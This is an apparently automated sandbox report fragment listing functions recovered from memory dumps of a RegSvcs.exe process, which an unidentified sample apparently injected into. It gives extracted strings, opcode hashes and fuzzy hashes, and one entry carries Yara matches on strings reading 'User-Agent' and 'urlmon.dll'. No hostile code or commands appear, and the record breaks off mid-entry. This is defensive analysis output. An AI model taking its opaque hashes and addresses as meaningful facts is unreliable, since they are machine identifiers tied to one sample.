                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01470D60
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01470D74
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                          • String ID:
                                                          • API String ID: 1404860816-0
                                                          • Opcode ID: 69909d7356183be24aecf6e2f931d1a248ae4ddd020e17c65c44fd8fbf3f09c6
                                                          • Instruction ID: c70b5521b803c7bc17cdfdb492133c1034b29c079fd1ff57e92db0a48747a19e
                                                          • Opcode Fuzzy Hash: 69909d7356183be24aecf6e2f931d1a248ae4ddd020e17c65c44fd8fbf3f09c6
                                                          • Instruction Fuzzy Hash: D3426871900705DFDB21CF28C880BEAB7F5FF14314F1485AAE989AB251E770AA85CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00417322 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Us$: $er-A$gent$urlmon.dll
                                                          • API String ID: 0-1367105278
                                                          • Opcode ID: 9d3d2a38b343886ca47adc41842567aafca2ef4ea211bc3042d621377065c904
                                                          • Instruction ID: 1f36d700d9b72d24eecac4dd6c17bf37ad8148b6cf100f03f5971deebda3ae86
                                                          • Opcode Fuzzy Hash: 9d3d2a38b343886ca47adc41842567aafca2ef4ea211bc3042d621377065c904
                                                          • Instruction Fuzzy Hash: A0214872E452099BDB01CF949C02BFEF7B4EB46714F040296EC546B251D73D0A82C7DA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0143A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                          • API String ID: 0-379654539
                                                          • Opcode ID: c46cb30acd10a874880ec22c9b277e539de3e503869c054917757be8b19169c6
                                                          • Instruction ID: 7ce20e4e9b0d9243450b8f6db5277069858b446111f8654f7c47dcd801318186
                                                          • Opcode Fuzzy Hash: c46cb30acd10a874880ec22c9b277e539de3e503869c054917757be8b19169c6
                                                          • Instruction Fuzzy Hash: CEC186741483829BDB11CF59C144B6ABBE4BF98704F10496AF9D6CB3A1E374C94ACB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01468402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01468421
                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0146855E
                                                          • @, xrefs: 01468591
                                                          • LdrpInitializeProcess, xrefs: 01468422
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1918872054
                                                          • Opcode ID: 1c1d387f91cfc70fcfe3c79e76d776b1313340ee13a947508d2ec9c362933191
                                                          • Instruction ID: df44e3a6cd2d444db3c6b277c9b1a4f10c30bafeff0e73197eb3f67a3714e823
                                                          • Opcode Fuzzy Hash: 1c1d387f91cfc70fcfe3c79e76d776b1313340ee13a947508d2ec9c362933191
                                                          • Instruction Fuzzy Hash: 8D917C71508346AFE721DF66C940FABBBECEBA4744F40092FFA8496161E774D9048B62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014A22B6
                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014A21D9, 014A22B1
                                                          • .Local, xrefs: 014628D8
                                                          • SXS: %s() passed the empty activation context, xrefs: 014A21DE
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                          • API String ID: 0-1239276146
                                                          • Opcode ID: ddf87ebe2d76d93888a795ba14e9da5a6e1c4c578a327ea4e8c4250283982080
                                                          • Instruction ID: 825a12bb2e8318cd3c3081f102b5809c4b9633396578061149ba2d2e9283008c
                                                          • Opcode Fuzzy Hash: ddf87ebe2d76d93888a795ba14e9da5a6e1c4c578a327ea4e8c4250283982080
                                                          • Instruction Fuzzy Hash: 3BA1B431A0022A9BDB24CF59DC84F9AB3B4BF68358F1541EBD908A7361D7709E85CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01464AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 014A3456
                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 014A342A
                                                          • RtlDeactivateActivationContext, xrefs: 014A3425, 014A3432, 014A3451
                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 014A3437
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                          • API String ID: 0-1245972979
                                                          • Opcode ID: 2a28ce67640b2713f95c8fc9aafaa4b5c2ab74a2b3331c17559be8bf3bb5dba8
                                                          • Instruction ID: ee76260efb4f7d80bdae5bfad1e02a335c2f0613bb1ba6531512131b46b0a9ad
                                                          • Opcode Fuzzy Hash: 2a28ce67640b2713f95c8fc9aafaa4b5c2ab74a2b3331c17559be8bf3bb5dba8
                                                          • Instruction Fuzzy Hash: 296104766007129BDB22CF1DC841B6BB7E5BFA0B14F5A852FE9559B360D730E801CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014910AE
                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01490FE5
                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01491028
                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0149106B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                          • API String ID: 0-1468400865
                                                          • Opcode ID: f80c69312d25fe61bb5d228648484364f1b499e89848af0f597af8a8487448e6
                                                          • Instruction ID: 8793e0e32fd0039ed480c154b728a6740421c07bbf71ba845ba9d7b13b1d5f17
                                                          • Opcode Fuzzy Hash: f80c69312d25fe61bb5d228648484364f1b499e89848af0f597af8a8487448e6
                                                          • Instruction Fuzzy Hash: 1C71F5B1504346AFCB21DF15C884F977FA8AFA8764F40046EF9488B2A6D375D289CBD1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0149A9A2
                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0149A992
                                                          • apphelp.dll, xrefs: 01452462
                                                          • LdrpDynamicShimModule, xrefs: 0149A998
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-176724104
                                                          • Opcode ID: 413c14b35224836794c0d2ea8dbef98b4746be1e7eab0df2c895b094aa327da8
                                                          • Instruction ID: c74b59dab5a7ae0a63974e62a25414ea4029e0ca86c66881d3694da56c8d1175
                                                          • Opcode Fuzzy Hash: 413c14b35224836794c0d2ea8dbef98b4746be1e7eab0df2c895b094aa327da8
                                                          • Instruction Fuzzy Hash: 99312772600202EBDB319F5A9841E6A7BB5FB96B00F36002FE911AB376D7B45946D740
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • HEAP: , xrefs: 01443264
                                                          • HEAP[%wZ]: , xrefs: 01443255
                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0144327D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                          • API String ID: 0-617086771
                                                          • Opcode ID: c8eb1b9456ccbad7910cf9a1cd83f032949281fa34811128c8b4ac481a96d7c9
                                                          • Instruction ID: 4772e5e7ad1d7f8cb04a01025772988d010ee617557ca1637de848ee13191558
                                                          • Opcode Fuzzy Hash: c8eb1b9456ccbad7910cf9a1cd83f032949281fa34811128c8b4ac481a96d7c9
                                                          • Instruction Fuzzy Hash: 5692DE70A042599FEB25CF69D440BAEBBF1FF48710F18809EE859AB361D774A942CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01440770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-4253913091
                                                          • Opcode ID: 44f1988ad51020a0bfb981f32dbf91e55e918c18cb2d03368e861d7b57d5644f
                                                          • Instruction ID: 14592f36a8f8b0e046e7f6abe3473ba16060f49c7cc500c9addf47c165a5e1e7
                                                          • Opcode Fuzzy Hash: 44f1988ad51020a0bfb981f32dbf91e55e918c18cb2d03368e861d7b57d5644f
                                                          • Instruction Fuzzy Hash: 2FF1B174A00605DFEB16CF69C984BAABBB1FF44300F2441AAE6169B361D734E951CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01456962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: $@
                                                          • API String ID: 2994545307-1077428164
                                                          • Opcode ID: b4b9c8be003c39e0e4c26b2af04cba0514c526e3756dee8152ed56cb7639dff4
                                                          • Instruction ID: 1942bc96b87270f56aaf91d21a86aaad5a2a95600a59154919c71d53788a5ab5
                                                          • Opcode Fuzzy Hash: b4b9c8be003c39e0e4c26b2af04cba0514c526e3756dee8152ed56cb7639dff4
                                                          • Instruction Fuzzy Hash: 01C282716083419FEB65CF29C480BABBBE5AF88754F44892EFD8987362D734D805CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                          • API String ID: 0-2779062949
                                                          • Opcode ID: ba32b1ad9a2ad29682c9a66392fd568a04af1321fb2f542bcb6a5b23bf174969
                                                          • Instruction ID: dab87482c6944cb3d93fd887f5138eb10350b694cb45de33161204323f5947fe
                                                          • Opcode Fuzzy Hash: ba32b1ad9a2ad29682c9a66392fd568a04af1321fb2f542bcb6a5b23bf174969
                                                          • Instruction Fuzzy Hash: 99A14C719016299BDB31AF68CC88BEEB7B8EF54714F1001EAD909A7260D7359EC5CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01450BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0149A121
                                                          • Failed to allocated memory for shimmed module list, xrefs: 0149A10F
                                                          • LdrpCheckModule, xrefs: 0149A117
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-161242083
                                                          • Opcode ID: f4ad74cb471e017affbb3b8b047e1996b6d0c6a03db21f596f1542b415f7623d
                                                          • Instruction ID: ed861a665e529df50d6969f6fb48bc4ccd6a967f43bb5b2c2deb3dc3212d66e3
                                                          • Opcode Fuzzy Hash: f4ad74cb471e017affbb3b8b047e1996b6d0c6a03db21f596f1542b415f7623d
                                                          • Instruction Fuzzy Hash: 9971F575A002069FDF29DF69C841AAEB7F4FB55304F25402EE812DB362E734AD46CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01440A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-1334570610
                                                          • Opcode ID: 2092c7fa88d9dc8adc327f603fa1059b26bd167063647d28a89384a3a05984af
                                                          • Instruction ID: 52d3167be69662edabb8a39c6560c451c44d9165bcf7fcc8f678a9a80487eb6e
                                                          • Opcode Fuzzy Hash: 2092c7fa88d9dc8adc327f603fa1059b26bd167063647d28a89384a3a05984af
                                                          • Instruction Fuzzy Hash: 9261BC706003419FEB29CF29C440BAABBA1FF54304F24856FE9598F3A2D770E891CB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Failed to reallocate the system dirs string !, xrefs: 014A82D7
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 014A82E8
                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 014A82DE
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1783798831
                                                          • Opcode ID: 39ddfabde3e4518b2c8b6366590ef07ebfad3211b50de3fce959977f1c4bab67
                                                          • Instruction ID: 461b42221b46080447b9255d84f8530484eaecb14212e68e1011f724ebc43e4c
                                                          • Opcode Fuzzy Hash: 39ddfabde3e4518b2c8b6366590ef07ebfad3211b50de3fce959977f1c4bab67
                                                          • Instruction Fuzzy Hash: 0441F472500312ABD730EF69D880B5B77E8FB69655F01082FF9949B2B0E774E8049B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • PreferredUILanguages, xrefs: 014EC212
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 014EC1C5
                                                          • @, xrefs: 014EC1F1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                          • API String ID: 0-2968386058
                                                          • Opcode ID: ca7ac38938d009226b6e04994fd971ef4cd88b53398e67d7cffb798827e37acf
                                                          • Instruction ID: 25d757576273d1e96b5012c0cb3bddbbf27d7b0225cecb0024d2302bcd9b8c56
                                                          • Opcode Fuzzy Hash: ca7ac38938d009226b6e04994fd971ef4cd88b53398e67d7cffb798827e37acf
                                                          • Instruction Fuzzy Hash: 96418272E0021AEBDF11DFD9C885FEEBBF8AB24701F14406BE609B7260D7749A458B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                          • API String ID: 0-1373925480
                                                          • Opcode ID: c94fb5f17e70950c0887f4a08c2e95d55a476eef81807fba877e60d492482db1
                                                          • Instruction ID: 7f340d1433346a3673cca3ff0fab61840987842ff9b82762aea5aeeabca20479
                                                          • Opcode Fuzzy Hash: c94fb5f17e70950c0887f4a08c2e95d55a476eef81807fba877e60d492482db1
                                                          • Instruction Fuzzy Hash: 9C410575A002588BEB26DFD9C964BADBBB5FFA5B40F18045FD941EB3A1DB348901CB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 014B4888
                                                          • LdrpCheckRedirection, xrefs: 014B488F
                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 014B4899
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                          • API String ID: 0-3154609507
                                                          • Opcode ID: 75131afd21721d2f1666ebae35d81ec02d3c8ee72f4b0df8ac937d0e5970c6e6
                                                          • Instruction ID: 42f8e3af15fb4efa5866a76cc194f9b5421051ac7113aa2ab28e196cb8ef59f6
                                                          • Opcode Fuzzy Hash: 75131afd21721d2f1666ebae35d81ec02d3c8ee72f4b0df8ac937d0e5970c6e6
                                                          • Instruction Fuzzy Hash: 8541C436A046519BCB21CE5DD8C0AA77BE4AF49650B0E056FED5A9B373D730D801CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01440BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-2558761708
                                                          • Opcode ID: be15fae9664e7039c6fdcdf71f929c5400cf553c7e8646e84d779e9b462610a6
                                                          • Instruction ID: 2c3de73dfc6b4129a64d2836a396f9f6ac785bd8ec407f14684de7515bd06336
                                                          • Opcode Fuzzy Hash: be15fae9664e7039c6fdcdf71f929c5400cf553c7e8646e84d779e9b462610a6
                                                          • Instruction Fuzzy Hash: C311DF313151829FEB6ACB19C440BB6BBA4EF50615F28816FF606CF271DB30D891CB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 014B2104
                                                          • Process initialization failed with status 0x%08lx, xrefs: 014B20F3
                                                          • LdrpInitializationFailure, xrefs: 014B20FA
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2986994758
                                                          • Opcode ID: 25c91b4a385a17efffa66940aa5fd2ea2c165fe461b2d7004343fddbcdd4ea95
                                                          • Instruction ID: 3315d081a6b6e7074ffaa681b9b66e2156e7fc074d9196faba6131b3e640445c
                                                          • Opcode Fuzzy Hash: 25c91b4a385a17efffa66940aa5fd2ea2c165fe461b2d7004343fddbcdd4ea95
                                                          • Instruction Fuzzy Hash: 06F02836640308ABE730EA0DDC82FDA3768EB51B44F25001FFA007B2A5D2F0A500C650
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: #%u
                                                          • API String ID: 48624451-232158463
                                                          • Opcode ID: 93f1d421c0b299f722ebc3737ebd07ffe37abb8ec8aa066353c74379138f0393
                                                          • Instruction ID: 5b0089d709c115624de5ebf7b90a5a32025534658cc99ef3f26ecdd118e8ad06
                                                          • Opcode Fuzzy Hash: 93f1d421c0b299f722ebc3737ebd07ffe37abb8ec8aa066353c74379138f0393
                                                          • Instruction Fuzzy Hash: 0E714DB1A0014A9FDB01DF99C990BAEBBF8BF18704F15406AE905E7261E634ED02CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0143A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrResSearchResource Enter, xrefs: 0143AA13
                                                          • LdrResSearchResource Exit, xrefs: 0143AA25
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                          • API String ID: 0-4066393604
                                                          • Opcode ID: 3f61705e49b9183d27e2c6e368e4d7b92667f5e06fceb621a3594082b8793a80
                                                          • Instruction ID: f7ad2ac5319bcfb710e2f8a692d83690c3dbd367abd57f2d07e858593b72c627
                                                          • Opcode Fuzzy Hash: 3f61705e49b9183d27e2c6e368e4d7b92667f5e06fceb621a3594082b8793a80
                                                          • Instruction Fuzzy Hash: 38E1A271A40209AFEF25DEA9C944BAEBBB9BF99310F20042BE941E7375D7749841CB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction ID: 06704bcfb4caf0c11ed4da1c2304318993033f4cba1736155b7002950d9f7ca8
                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                          • Instruction Fuzzy Hash: 98C1C0312043429BE725CF29C844B6BBBE5EFD4318F284A2EF69A8B3A0D774D505CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 2994545307-634100481
                                                          • Opcode ID: 3b09ceb0c4fd4cb8537e8521f4d75d7658c75d724935df2f7f739f4ae300d9ff
                                                          • Instruction ID: e68999097950b92a68716b3651599f8e1398cf0a273d00bcc01e8dac55e79721
                                                          • Opcode Fuzzy Hash: 3b09ceb0c4fd4cb8537e8521f4d75d7658c75d724935df2f7f739f4ae300d9ff
                                                          • Instruction Fuzzy Hash: 4E616F71E003099FDB25DFA9C980BAEBBB5FB64700F55402EE659EB2A1D731E901CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                          Download Yara Rule
